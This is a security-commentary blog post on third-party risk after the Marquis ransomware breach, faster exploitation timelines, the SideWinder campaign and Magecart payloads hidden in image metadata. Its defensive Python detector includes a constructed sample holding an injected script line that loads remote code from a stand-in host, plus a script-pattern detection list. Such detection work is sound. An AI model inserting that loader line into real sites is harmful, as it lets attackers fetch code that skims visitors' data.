The Marquis Attack Shows Why Third-Party Risk Just Got Real
You know that conversation we’ve been having for years about third-party risk? Well, it just got a lot less theoretical. The Marquis ransomware attack that hit back in August 2025 is finally getting the attention it deserves – and the numbers are staggering.
We’re talking about 672,000 people’s data stolen and operations disrupted at 74 banks across the United States. Let that sink in for a moment. One financial services provider gets compromised, and suddenly 74 banks are dealing with operational issues. This isn’t just a breach; it’s a perfect case study in how interconnected our financial infrastructure really is.
When Your Vendor Becomes Your Biggest Risk
What makes the Marquis incident particularly sobering is how it demonstrates the ripple effect of modern business relationships. Most of those 74 banks probably had solid security programs, regular penetration tests, and all the compliance checkboxes ticked. But none of that mattered when their third-party provider became the entry point.
This connects directly to what security professionals are discussing at events like today’s Supply Chain & Third-Party Risk Summit. The reality is that cyber risk doesn’t respect organizational boundaries, and we’re seeing this play out in real-time consequences.
I’ve been in enough vendor risk assessments to know how this usually goes. We send out questionnaires, maybe do a quick review of their SOC 2 report, and call it good. But are we really understanding the blast radius if that vendor gets compromised? The Marquis attack suggests we’re not asking the right questions.
The Speed Problem Gets Worse
Speaking of things getting worse, let’s talk about something that should keep us all up at night. Rapid7’s latest research shows that the median time from vulnerability publication to CISA KEV inclusion has dropped to just five days. Five days.
This isn’t just about faster discovery – it’s about AI-enabled adversaries compressing the entire attack lifecycle. While we’re still running our monthly patch cycles and waiting for change approval boards, attackers are already weaponizing vulnerabilities before most of us have even read the CVE description.
I remember when we used to talk about having a 30-day window to patch critical vulnerabilities. Those days are gone. The new reality is that if you’re not patching within days of disclosure, you’re essentially running unprotected systems in a hostile environment.
State-Level Persistence Gets Sneakier
The SideWinder campaign expanding across Southeast Asia shows us another concerning trend. This suspected India-linked group isn’t just hitting random targets – they’re systematically going after governments, telecom providers, and critical infrastructure using a combination of spear-phishing and old vulnerabilities.
What’s particularly clever about their approach is the rapidly rotating infrastructure. Just when you think you’ve got their indicators of compromise figured out, they’ve moved to new domains and IP addresses. It’s like playing whack-a-mole with an opponent who keeps changing the rules.
The persistence aspect is what really gets me. These aren’t smash-and-grab operations; they’re establishing long-term access to critical systems. For those of us defending infrastructure in the region, this represents a fundamental shift in how we need to think about threat modeling.
The Blind Spots in Our New Tools
Here’s something that caught my attention in the Claude Code Security analysis: even our shiny new AI-powered security tools have significant blind spots. The example they give is perfect – a Magecart payload hiding in the EXIF data of a dynamically loaded favicon. Your repository scanner will never catch this because the malicious code never actually touches your repo.
This is the technical boundary where static analysis stops and runtime execution begins. We’re getting better at scanning code, but we’re still struggling with dynamic, client-side threats that assemble themselves at runtime. It’s a reminder that no single tool or approach is going to solve our security challenges.
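One place a defender can still look is the resource the browser actually receives: the script below (an added example, not code from the original post or from the Claude Code Security analysis it cites) walks the header segments of a JPEG, as served, and flags COM or APPn/EXIF segments that contain JavaScript-looking text. The sample images are constructed inline, the pattern list is an assumption you would tune per site, and it handles JPEG only; a PNG or ICO favicon would need its own chunk parser.

```python
import re
import struct

EOI, SOS = 0xD9, 0xDA
# Segments that carry free-form metadata: COM (0xFE) and APP0-APP15 (EXIF lives in APP1).
METADATA_MARKERS = {0xFE, *range(0xE0, 0xF0)}
# Signals of client-side script text hidden in metadata (assumed list; tune for your site).
SCRIPT_PATTERNS = re.compile(
    rb"(document\.|window\.|eval\s*\(|atob\s*\(|createElement|<script|\.src\s*=)", re.I
)

def jpeg_segments(data: bytes):
    """Yield (marker, payload) for each header segment up to start-of-scan."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG file")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("corrupt marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker in (SOS, EOI):  # entropy-coded image data follows; no more metadata
            return
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]  # counts its own 2 bytes
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length

def find_script_in_metadata(data: bytes):
    """Return [(marker_hex, matched_snippet)] for metadata segments that look like script."""
    hits = []
    for marker, payload in jpeg_segments(data):
        if marker in METADATA_MARKERS:
            m = SCRIPT_PATTERNS.search(payload)
            if m:
                hits.append(("0x%02X" % marker, m.group(0).decode("latin-1")))
    return hits

def _segment(marker: int, payload: bytes) -> bytes:
    """Build one JPEG segment; used only to construct the sample images below."""
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload

# Constructed samples: a benign favicon and one whose APP1/EXIF block smuggles script text.
_TAIL = b"\xff\xda\x00\x02" + b"\xff\xd9"  # minimal SOS header, then EOI
BENIGN_JPEG = b"\xff\xd8" + _segment(0xE0, b"JFIF\x00\x01\x01") + _segment(0xFE, b"logo v2") + _TAIL
EXIF_PAYLOAD = b"Exif\x00\x00MM\x00*" + b"document.createElement('script').src='//example.invalid/x.js'"
SUSPICIOUS_JPEG = b"\xff\xd8" + _segment(0xE1, EXIF_PAYLOAD) + _TAIL

if __name__ == "__main__":
    for name, img in (("benign", BENIGN_JPEG), ("suspicious", SUSPICIOUS_JPEG)):
        print(name, find_script_in_metadata(img))
```

Run it against images fetched by a headless browser session rather than against the repository, since the point of the example is that the payload only exists in what the client loads.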
What This Means for Our Day-to-Day Work
Looking at these stories together, I see three immediate priorities for our security programs. First, we need to completely rethink how we assess and monitor third-party risk. The Marquis attack shows that a vendor’s compromise can become our operational crisis overnight.
Second, our patch management processes need to match the new reality of AI-accelerated exploitation. If we’re not prepared to patch critical vulnerabilities within days, not weeks, we’re accepting unnecessary risk.
Finally, we need to acknowledge that our detection and response capabilities have to account for both state-level persistence campaigns and dynamic client-side attacks that assemble themselves at runtime. Our traditional perimeter-focused thinking isn’t cutting it anymore.
The common thread through all of these stories is that the threat environment is becoming more sophisticated while our attack surface keeps expanding. But that doesn’t mean we’re helpless – it means we need to be more strategic about where we focus our limited resources and attention.
Sources
- Marquis: Ransomware gang stole data of 672K people in cyberattack
- Virtual Summit Today: Supply Chain & Third-Party Risk Summit
- SideWinder Espionage Campaign Expands Across Southeast Asia
- AI-Enabled Adversaries Compress Time-to-Exploit Following Vulnerability Disclosure
- Claude Code Security and Magecart: Getting the Threat Model Right